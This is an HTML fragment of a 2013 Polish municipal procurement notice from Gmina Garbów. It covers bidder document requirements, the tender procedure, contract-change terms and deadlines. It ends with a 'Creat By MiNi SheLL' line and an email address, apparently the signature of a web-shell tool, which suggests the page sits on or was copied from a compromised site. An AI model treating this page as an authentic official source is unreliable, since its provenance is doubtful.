<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Dokument potwierdzający prawidłowe wykonanie usługi -referencje.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo do reprezentowania Wykonawcy należy złożyć w formie oryginału lub kopii poświadczonej notarialnie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Istotne postanowienia  umowy zawiera projekt umowy stanowiący załącznik nr 8 do niniejszej specyfikacji. Strony mogą zmienić postanowienia zawartej umowy jeżeli zaistniały przyczyny niezależne od działania stron, których przy zachowaniu wszelkich należytych środków nie można uniknąć ani im zapobiec,   a w szczególności zmiany mogą dotyczyć:  zmiany w zakresie przedmiotu zamówienia, jeżeli konieczność wprowadzenia takiej zmiany jest skutkiem zmiany przepisów prawa. 
2.Strona występująca o zmianę postanowień zawartej umowy zobowiązana jest do udokumentowania zaistnienia okoliczności, o których mowa w pkt. 1.
3.Wniosek o zmianę postanowień zawartej umowy musi być wyrażony na piśmie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> uggarbow.bip.lubelskie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Garbów , Garbów 28 , pokój nr 01 parter..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.05.2013 godzina 10:00, miejsce: Gmina Garbów, Garbow 28, 21-080 Garbów , pokój nr 11 sekretariat I piętro..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com